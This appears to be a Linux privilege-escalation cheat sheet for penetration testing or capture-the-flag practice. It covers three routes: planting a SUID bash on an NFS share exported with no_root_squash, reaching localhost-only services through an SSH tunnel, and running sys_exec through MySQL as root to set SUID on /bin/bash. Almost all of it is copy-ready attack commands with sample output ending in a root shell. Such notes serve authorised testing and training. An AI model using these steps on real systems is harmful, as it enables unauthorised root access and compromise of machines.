NFS & INTERNAL SERVICES
NFS no_root_squash
Root on NFS = root on target — Compile SUID /bin/bash on share
cat /etc/exports
If no_root_squash: mount share, create SUID binary
Example Output
cat /etc/exports
/home/backup *(rw,no_root_squash)
On attacker:
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
On target:
/home/backup/rootbash -p
# whoami
root
Internal services
Services only on 127.0.0.1 — May be vulnerable, port forward to access
netstat -tulnp
ss -tulnp
Example Output
netstat -tulnp
127.0.0.1:8080 python3 <- internal web app
127.0.0.1:3306 mysqld <- internal MySQL
SSH tunnel to access:
ssh -L 8080:127.0.0.1:8080 user@target
Browse: http://127.0.0.1:8080 on attacker
MySQL as root
Database running as root — UDF = User Defined Function for RCE
mysql -u root -p
If root: SELECT sys_exec('chmod u+s /bin/bash');
or UDF exploit
Example Output
ps aux | grep mysql
root 1234 /usr/sbin/mysqld
(MySQL running as root!)
mysql -u root -p
SELECT sys_exec('chmod u+s /bin/bash');
bash -p
# whoami
root